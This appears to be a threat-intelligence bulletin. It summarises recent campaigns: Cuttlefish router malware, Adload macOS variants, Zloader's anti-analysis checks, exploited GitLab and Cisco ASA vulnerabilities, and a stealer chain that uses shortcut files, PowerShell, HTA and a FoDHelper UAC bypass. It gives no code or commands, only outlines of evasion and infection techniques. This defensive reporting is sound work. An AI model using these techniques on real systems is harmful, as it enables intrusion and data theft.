Threat Alerts

Researchers have discovered a new malware named Cuttlefish that targets enterprise-level small office/home office routers to steal sensitive data from local networks.

The malware is modular, capable of DNS and HTTP hijacking, and can interact with devices on the network. A similarity to the activities of a China-related cluster called HiatusRat was observed, although no direct victim overlap was found.

Cuttlefish operates by sniffing network packets for authentication data, especially targeting cloud services, and exfiltrates this data using proxies or VPNs through compromised routers to mimic legitimate user sign-ins. Active since at least July 2023, with prior iterations indicated, the campaign predominantly affected Turkey from October 2023 to April 2024, implicating two main telecom providers and hitting 600 unique IPs, with a few global victims including satellite phone users and a possible US data center.

Cuttlefish emphasizes the need for robust cybersecurity measures, particularly for organizations relying on enterprise-grade SOHO routers. Continuous monitoring and upgrading security protocols are essential to mitigate the risks posed by such advanced malware platforms.

Adload, a prominent adware distributor notorious for its relentless assaults on macOS systems, has swiftly adapted its strategies in response to Apple’s latest security updates. Despite Apple’s implementation of more than 80 new rules in the last two versions of the XProtect malware signature list, Adload’s developers have pivoted quickly and emerged with new variants of the adware, many of which manage to bypass not only XProtect but also other reputable security vendors. One such variant, labeled Adload Go, stands out due to its minimal detection rate on VirusTotal, with only a single detection or none at all among various engines.

These new Adload variants operate through a multi-stage attack chain, beginning with the execution of initial droppers designed to deliver subsequent payloads. Despite the absence of clear relationships to parent executables or applications, these droppers embed unique custom domains, following known Adload patterns.

Upon execution, the droppers initiate system information discovery via the ‘ioreg’ utility and attempt to retrieve remote data by resolving hardcoded domain names. The retrieved data is then written to a subdirectory in /tmp/.

Notably, despite Apple’s efforts to target artifacts associated with Adload in its signatures, the malware continues to evade detection, exploiting minor tweaks and alterations to bypass security measures.

Researchers have discovered that the Zloader trojan – dormant for nearly two years – has resurfaced with sophisticated updates designed to avoid detection. Leveraging the foundational Zeus source code, Zloader has implemented a refined anti-analysis feature that restricts its functionality strictly to the initially infected host. This adaptation demonstrates the malware’s evolution toward enhanced stealth and persistence in its operations.

The Zloader anti-analysis mechanism operates by checking for the presence of a specific registry key and value, uniquely created for each infected machine using a hardcoded seed. If these elements are not found – indicative of an attempt to analyze the malware in an environment other than the original infection – the malware will terminate. The deliberate generation of registry entries using the Mersenne Twister algorithm and their intricate encryption thwarts the ability to run or examine the malware on different systems.

The introduction of these complex anti-analysis techniques signifies a strategic shift in Zloader’s deployment, suggesting a move toward more targeted attacks. The challenge posed by these advanced features reinforces the importance of adaptive and proactive cybersecurity measures, underscored by a commitment to continuous vigilance and defense against such evolving threats.

The critical GitLab vulnerability, CVE-2023-7028 with a CVSS score of 10.0, has been confirmed by the US Cybersecurity and Infrastructure Security Agency (CISA) as actively exploited in the wild, putting approximately 1,400 unpatched servers at risk.
Initially documented in the CTI Weekly Highlights report from January 15th, 2024, this flaw compromises the platform’s email verification process, potentially allowing unauthorized actors to initiate password resets.
Currently, no detailed information on the methods of exploitation has been shared. However, if successfully leveraged, this vulnerability could enable attackers to seize control of GitLab user accounts, extract confidential data, compromise credentials, and introduce malicious code into source code repositories, thereby posing a considerable risk of supply chain attacks.

Researchers have detected a series of sophisticated cyberattacks dubbed ArcaneDoor, specifically targeting devices running Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software. The campaign has actively exploited two zero-day vulnerabilities:

CVE-2024-20353 (CVSS score: 8.6) – A Denial-of-Service vulnerability in Cisco ASA and FTD Software’s Web Services.

CVE-2024-20359 (CVSS score: 6.0) – A Persistent Local Code Execution vulnerability in Cisco ASA and FTD Software, which requires administrator-level privileges to exploit.

Additionally, a third vulnerability, CVE-2024-20358 (CVSS score: 6.0), a command injection flaw, was also identified and addressed following its discovery during internal testing, although it was not exploited in the ArcaneDoor campaign.

The attackers utilized these vulnerabilities to install malware, execute unauthorized commands, and potentially exfiltrate data. While the precise initial access method used in these breaches remains unclear, Cisco has released critical updates to address vulnerabilities and recommends immediate application to secure devices.

A newly identified cyber threat campaign, active since at least February 2024, involves distributing three well-known information stealers: Cryptbot, LummaC2, and Rhadamanthys, using sophisticated tactics to bypass antivirus defenses. The attackers exploit a Content Delivery Network (CDN) cache domain to host malicious HTML application (HTA) files and payloads. They employ a clever technique involving an embedded PowerShell command in a Windows shortcut file to initiate the infection. This method deceives network defenses, facilitating the download of the final malware directly onto the user’s device.

The infection process is intricate and multi-staged. It begins when a user opens a malicious shortcut file, typically delivered through a ZIP file via drive-by download techniques or phishing emails. The shortcut triggers a PowerShell command that downloads and executes an HTA file from an attacker-controlled CDN domain.

This HTA file is heavily obfuscated and contains a JavaScript that decodes and runs a PowerShell decrypter script, which further decrypts and executes a PowerShell loader script in the user’s memory. This loader script is designed to perform several functions to evade detection and bypass user access controls (UAC). It utilizes techniques such as modifying registry settings and employing Windows features like FoDHelper to run commands with elevated privileges without user prompts. The ultimate goal is to download and run one of the payloads: Cryptbot, LummaC2, or Rhadamanthys. These payloads target sensitive information such as system and browser data, credentials, cryptocurrency wallets, and financial information.